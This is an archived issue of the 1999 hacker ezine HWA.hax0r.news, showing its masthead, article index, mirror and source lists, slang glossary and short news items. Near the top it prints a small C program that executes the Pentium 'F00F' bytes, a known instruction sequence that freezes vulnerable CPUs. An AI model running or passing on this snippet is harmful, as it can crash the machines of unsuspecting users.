💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn28.… captured on 2021-12-03 at 14:04:38.
-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 28 Volume 1 1999 Aug 7th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
Like all religions, the Holy Religion of the Invisible Pink Unicorn is based
upon both Logic and Faith. We have Faith that She is Pink; and we Logically
know that She is Invisible, because we can't see Her.
- http://www.ozemail.com.au/~ksolway/athquot.html
*/
char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };
main ()
{
void (*f)() = x;
f();
}
New mirror site :http://www.ducktank.net/hwa/issues.html.
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
and airportman for the Cubesoft bandwidth. Also shouts out to all our
mirror sites! tnx guys.
http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
For many, faith is a suitable substitute for knowledge,
as death is for a difficult life.
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #28
=-----------------------------------------------------------------------=
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #28
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Debunking the debunked by route..................................
04.0 .. DefCon 7 by AgentX...............................................
05.0 .. Hacking Faq by ben-z 5/14/99.....................................
06.0 .. Group approves controversial software law .......................
07.0 .. Falun Gong Web Sites Attacked by China? .........................
08.0 .. Super Computer Almost Gets Away .................................
09.0 .. Symantec's website hacked........................................
10.0 .. New virus due to hit town "New virus spills your beans " - BBC...
11.0 .. New York Times Debunked - FIDNet Moves Ahead as Planned .........
12.0 .. Computer `crackers' set sights on .gov for chaos.................
13.0 .. IIS Server 'hackproof'? .........................................
14.0 .. Latest CWD Pokes at AntiOnline ..................................
15.0 .. High Profile Sites Defaced ......................................
16.0 .. Off The Hook Goes Shortwave .....................................
17.0 .. Feds Stop Satellite Biz due to WireTaps .........................
18.0 .. InfoCriminals Should Face Reasonable Penalties ..................
19.0 .. L0pht Professional Plugin Pack For BO2K .........................
20.0 .. MS Wants Free Publicity?.........................................
20.1 .. MS: a crashed site is hard to hack!..............................
21.0 .. China Seeks to Develop Infowar Capabilities .....................
22.0 .. Online Banking Still Risky Congress Says ........................
23.0 .. NIPRNet Access Restricted .......................................
24.0 .. Gov Employees Personal Privacy at Risk ..........................
25.0 .. Other Security Challenges Offered ...............................
25.1 .. Software developer offers hacker challenge.......................
26.0 .. CCC Camp About to Get Under Way .................................
27.0 .. Hackers... Those Who Would Be Gods ..............................
28.0 .. European Crypto Mailing List ....................................
29.0 .. "Ya Wanna Be Hackers, Code Crackers, or just AOL Chat Room Yackers?"
30.0 .. WHO DO YOU WANT TO BE TODAY?.....................................
31.0 .. NAI GROUPSHIELD FOR EXCHANGE BUG.................................
32.0 .. How the blackhats work...........................................
33.0 .. ADMINS ASLEEP ON WATCH?..........................................
34.0 .. THEFT HURTS THE WELL.............................................
35.0 .. MICROSOFT SECURITY FLAWS.........................................
36.0 .. CHINESE CYBER WARRIORS...........................................
37.0 .. MICROSOFT AND SECURITY (AGAIN)...................................
38.0 .. THE ENEMY WITHIN.................................................
39.0 .. DRUNKEN HACKERS ON JERRY SPRINGER................................
40.0 .. DATA PROTECTION NOT TO BE IGNORED................................
41.0 .. WIRELESS ENCRYPTION HANDHELDS....................................
42.0 .. Y2K TO AID IN CYBERDEFENSE.......................................
43.0 .. BUGTRAQ:Yet Another ODBC Bugged ASP Sample Page..................
44.0 .. New mailing lists offered by www.securityfocus.com...............
45.0 .. Beyond Virtual Vaccinations......................................
46.0 .. Forgot your password? Try 'way2many' .........................
47.0 .. A Former Network Administrator Faces Felony Charges in Hacker-Site Case
48.0 .. Kevin's life now, and happy birthday Kevin.......................
49.0 .. Cybercrime up 43%................................................
50.0 .. Canada Can't Keep Up With CyberCrime ............................
51.0 .. Germans hold bank liable for using 56 bit encryption.............
52.0 .. GPS Date Rollover on Aug 22 .....................................
53.0 .. NY Police Face Possible Copyright Violations ....................
54.0 .. Chaos Computer Club: Happy Hacker Campers........................
55.0 .. Hackers and Cyberwar "The Threat of Chaos " .................
56.0 .. Lockdown 2000....................................................
57.0 .. The SMURF attack and smurf amplifiers............................
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................
Ha.Ha .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe,
visit http://www.counterpane.com/unsubform.html.� Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.� He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09
�����
��������������������� ISSN� 1004-042X
������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
������ Archivist: Brendan Kehoe
������ Poof Reader:�� Etaion Shrdlu, Jr.
������ Shadow-Archivists: Dan Carosone / Paul Southworth
������������������������� Ralph Sims / Jyrki Kuoppala
������������������������� Ian Dickinson
������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
eentity ...( '' '' ): Currently active/IRC+ man in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media
Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck, where the fuck, when the fuck etc ..
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix
Ken Williams/tattooman of PacketStorm, hang in there Ken...:(
& Kevin Mitnick (Happy Birthday)
kewl sites:
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ******
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ SOPHOS WITH OXFAM
From www.net-security.org/
by BHZ, Thursday 5th August 1999 on 1:58 pm CET
Oxfam (www.oxfam.org), Britain's largest overseas aid charity, which employs over
250000 people, evaluated all anti-virus products on the market and chose Sophos
(www.sophos.com) for securing their WANs, servers, workstations and laptops of
viruses.
++ MICROSOFT STILL WORKING
From www.net-security.org/
by BHZ, Thursday 5th August 1999 on 1:49 pm CET
Microsoft is still trying to patch a bug in Office97, that we reported about earlier.
Microsoft's group product manager for Office said: "Right now we are thoroughly
testing the solution, We take all security issues seriously. To date, we have not
heard from any customers on the issue".
++ Y2K IN SCHOOL SYSTEMS
From www.net-security.org/
by BHZ, Thursday 5th August 1999 on 1:25 pm CET
New draft about Y2K problem in schools and universities, says some very disturbing
news - less that one third of all school institutions reported that they are Y2K
compliant. Draft concludes that: "a troubling number of institutions, especially in the
elementary/secondary area, have not yet completed their assessment of systems
and are lagging in remediation and testing."
++ JAPAN WILL HALT TRAINS
From www.net-security.org/
by BHZ, Thursday 5th August 1999 on 1:53 pm CET
Spokesman from East Japan Railway Co., Japan's largest rail company said that
they will halt all trains on the last day of this millennium. It will last just for couple of
minutes - last minutes of 1999 and several minutes in the year 2000. This will all be
done as a precaution against possible Y2K errors.
++ OUTDOOR GEEKS MAY VANISH SOON (TECH. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/21098.html
Weekend warriors take to the oceans, forests, rivers, and
skies this month, and they'll get back home with the help of
GPS. Unless the gear crashes. By James Glave.
++ DROP OUT AND CASH IN (BUS. 9:00 am)
http://www.wired.com/news/news/email/explode-infobeat/business/story/21116.html
Score one more for the geeks who drop out of school. A
21-year-old from Dallas sells his hardware review Web site
to EarthWeb for millions. By Chris Gaither.
++ Y2K CZAR: FEDS IN GOOD SHAPE (BUS. 9:00 am)
http://www.wired.com/news/news/email/explode-infobeat/business/story/21114.html
In his quarterly report, John Koskinen says things look good
at a national level, but some local systems are iffy. Also:
Warner Bros. pushes Iron Giant on the Web.... AOL, BigE in
Latin American deal.... Everyone wants a robodog....
And more.
++ A NUTS-AND-BOLTS HOUSEKEEPER (TECH. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/21060.html
To hell with your Hoover. A new domestic robot will vacuum
your floor and carry the dishes for you. But your new
housemate is a long way from having a personality. By
Lindsey Arent.
++ COURT HAS A NASTY WORD FOR MS (POL. Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/politics/story/21096.html
As if Microsoft weren't having enough trouble with the courts
these days, jurists are upset because Word 97 is doing a
lousy job word-counting legal briefs. By Declan McCullagh.
++ A PALM IN THE TOOL BELT (TECH. Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/21094.html
Construction workers are using PalmPilots onsite to download
blueprints and help plan for the weather. Staying connected
is yielding concrete results. By Lindsey Arent.
++ MICROWORKZ SIGNS ON AT&T (TECH. Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/21091.html
Dumped by Earthlink just days ago, the PC provider smoothes
its feathers and turns to AT&T to provide iToaster customers
with free Net access.
++ RIAA, DIAMOND SWEEP AWAY SUIT (POL. Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/politics/story/21089.html
The recording industry makes peace with the MP3 maker, but
questions over a new standard raises a new question: Will it
last? By Chris Oakes.
Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*A mixed bag of nuts in this issue, read on and enjoy..hope you
*find something interesting or useful...
* issue #28
*
* hwa@press.usmc.net
*
*/
printf ("EoF.\n");
}
